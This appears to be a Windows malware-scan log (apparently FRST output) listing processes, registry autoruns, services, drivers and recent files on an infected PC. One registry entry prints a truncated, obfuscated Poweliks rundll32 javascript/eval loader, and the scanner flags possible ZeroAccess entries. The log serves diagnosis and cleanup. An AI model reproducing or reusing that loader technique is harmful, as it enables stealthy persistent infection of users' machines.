(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(ANTS) C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe
() C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
() C:\Program Files\Core Temp\Core Temp.exe
(Novatel Wireless Inc.) C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
(Research In Motion Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(CANON INC.) C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2779024 2011-03-14] (CANON INC.)
HKLM-x32\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-03] (Intel Corporation)
HKLM-x32\...\Run: [57xxSteelVine] => C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe [1720320 2007-08-20] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [RIMBBLaunchAgent.exe] => C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe [90448 2011-09-01] (Research In Motion Limited)
HKLM-x32\...\Run: [AMD AVT] => C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe [10752 2012-01-31] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [641664 2012-04-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [413696 2009-01-05] (Apple Inc.)
HKLM-x32\...\Run: [CanonSolutionMenuEx] => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE [1612920 2011-08-04] (CANON INC.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-01-21] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\...\InprocServer32: [Default-wbemess] wbemess.dll ATTENTION! ====> ZeroAccess?
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SpybotSD TeaTimer] => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SansaDispatch] => C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [79872 2010-10-16] (SanDisk Corporation)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [DownloadAccelerator] => C:\Program Files (x86)\DAP\DAP.EXE [4242064 2014-10-04] (Speedbit Ltd.)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION!
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Core Temp.lnk
ShortcutTarget: Core Temp.lnk -> C:\Program Files\Core Temp\Core Temp.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://duckduckgo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x410DF1D8953FCD01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll (Speedbit Ltd.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: No Name -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} ->  No File
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKCU - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} -  No File
Toolbar: HKCU - No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} -  No File
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93}
DPF: HKLM-x32 {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab
DPF: HKLM-x32 {FA5D9BCA-4653-49FB-9237-FFA947877414} http://192.168.1.10/ZDVR.CAB
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 24.178.162.3 24.247.15.53

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll ()
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker
FF Extension: DAP Link Checker - C:\Program Files (x86)\DAP\daplinkchecker [2014-10-04]

Chrome:
=======
CHR Profile: C:\Users\JP\AppData\Local\Google\Chrome\User Data\Default

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 57xx SteelVine Manager; C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [1282048 2007-08-20] () [File not signed]
R2 AdobeActiveFileMonitor10.0; C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-01] (Adobe Systems Incorporated)
R2 AntsCMSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2403328 2013-03-07] (ANTS) [File not signed]
R2 AntsSTSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2038784 2013-03-02] () [File not signed]
S2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [4939312 2013-07-04] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [283136 2013-11-20] (AVG Technologies CZ, s.r.o.)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Media Toolbox 6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2011-06-20] (Hewlett-Packard Company) [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [276584 2009-11-06] (NVIDIA)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [117264 2009-10-20] (CACE Technologies, Inc.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 VZWConfigService; C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [218160 2012-04-16] (Novatel Wireless Inc.)
R2 MYSQL; "C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" MYSQL [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96768 2013-02-14] (Advanced Micro Devices) [File not signed]
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [246072 2013-11-25] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [71480 2013-07-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [206648 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [311608 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [116536 2013-07-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [45880 2013-10-23] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [240952 2014-04-15] (AVG Technologies CZ, s.r.o.)
R2 NPF; C:\Windows\System32\drivers\npf.sys [47632 2009-10-20] (CACE Technologies, Inc.)
R3 nvoclk64; C:\Windows\System32\DRIVERS\nvoclk64.sys [42088 2009-09-15] (NVIDIA Corp.)
S3 NwGPSOverWiFi64; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
S3 NWUSBLAN_4620; C:\Windows\System32\DRIVERS\nwblan_4620.sys [47472 2012-09-27] (Belcarra Technologies)
R3 nwusbserial; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
R3 PPorts; C:\Windows\System32\DRIVERS\PPorts.sys [95744 2009-07-23] ()
R3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 RivaTuner64; C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [19952 2010-01-06] ()
S3 Ser2ph; C:\Windows\System32\DRIVERS\ser2ph64.sys [89600 2008-03-06] (Prolific Technology Inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-17] ()
R3 ALSysIO; \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 08:30 - 2014-10-20 09:09 - 00000000 ____D () C:\FRST
2014-10-18 22:06 - 2014-10-18 22:14 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
2014-10-18 22:06 - 2014-10-18 22:06 - 00000064 _____ () C:\Windows\GPlrLanc.dat
2014-10-18 15:21 - 2014-10-18 15:21 - 00018835 _____ () C:\Users\JP\Desktop\dds.txt
2014-10-18 15:21 - 2014-10-18 15:21 - 00017360 _____ () C:\Users\JP\Desktop\attach.txt
2014-10-18 00:12 - 2014-10-18 01:08 - 00000000 ____D () C:\Users\JP\AppData\Local\CrashDumps
2014-10-17 22:49 - 2014-10-17 22:50 - 00002428 _____ () C:\Users\JR\Desktop\Rkill.txt
2014-10-17 22:43 - 2014-10-17 22:43 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-10-17 22:42 - 2014-10-17 22:46 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2014-10-17 22:42 - 00001397 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00001385 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 22:37 - 2014-10-17 22:37 - 00000348 _____ () C:\Windows\PFRO.log
2014-10-17 22:16 - 2014-10-17 22:16 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 22:16 - 2014-10-17 22:16 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 21:36 - 2014-10-17 21:36 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Share-to-Web Upload Folder
2014-10-17 21:10 - 2014-10-17 21:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Adobe
2014-10-17 21:09 - 2014-10-17 21:09 - 00001449 _____ () C:\Users\JR\Desktop\IE.lnk
2014-10-17 21:09 - 2014-10-17 21:09 - 00001415 _____ () C:\Users\JR\Desktop\IE (64-bit).lnk
2014-10-17 20:58 - 2014-10-17 20:58 - 00119024 _____ () C:\Users\JR\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Intel Corporation
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Canon
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\AVG2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\ATI
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Hewlett-Packard
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Avg2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\ATI
2014-10-17 20:57 - 2014-10-17 20:57 - 00001449 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00001415 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00000020 ___SH () C:\Users\JR\ntuser.ini
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\VirtualStore
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\NVIDIA Corporation
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\Adobe
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR
2014-10-17 20:57 - 2012-09-21 09:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\TuneUp Software
2014-10-17 20:57 - 2009-12-13 17:53 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Macromedia
2014-10-17 20:57 - 2009-12-03 18:41 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Recovery Manager
2014-10-17 20:57 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 20:57 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-17 20:22 - 2014-10-17 20:28 - 00005786 _____ () C:\Users\JP\Desktop\Rkill.txt
2014-10-17 19:48 - 2014-10-20 09:04 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-17 19:47 - 2014-10-17 20:49 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-17 19:47 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-17 19:47 - 2014-10-17 19:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-17 19:47 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-17 18:43 - 2014-10-20 08:19 - 00000448 _____ () C:\Windows\setupact.log
2014-10-17 18:43 - 2014-10-17 18:43 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-04 14:56 - 2014-10-17 00:48 - 00000000 ____D () C:\Users\Public\Documents\Speedbit
2014-10-04 14:51 - 2014-10-19 03:04 - 00001422 _____ () C:\Users\JP\Desktop\My DAP Downloads.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00001041 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Download Accelerator Plus (DAP).lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000941 _____ () C:\Users\JP\Desktop\DAP.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download Accelerator Plus (DAP)

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 09:01 - 2011-12-29 02:14 - 01726263 _____ () C:\Windows\WindowsUpdate.log
2014-10-20 08:27 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-20 08:27 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-20 08:26 - 2009-07-14 00:13 - 00730384 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-20 08:24 - 2012-09-08 10:10 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-20 08:20 - 2009-12-03 18:17 - 00000000 ____D () C:\ProgramData\Temp
2014-10-20 08:19 - 2013-01-30 22:44 - 00000354 _____ () C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job
2014-10-20 08:19 - 2013-01-26 11:51 - 00000354 _____ () C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job
2014-10-20 08:19 - 2009-12-03 18:13 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-20 08:19 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 03:39 - 2012-08-06 17:29 - 00000000 ____D () C:\Users\JP\AppData\Roaming\vlc
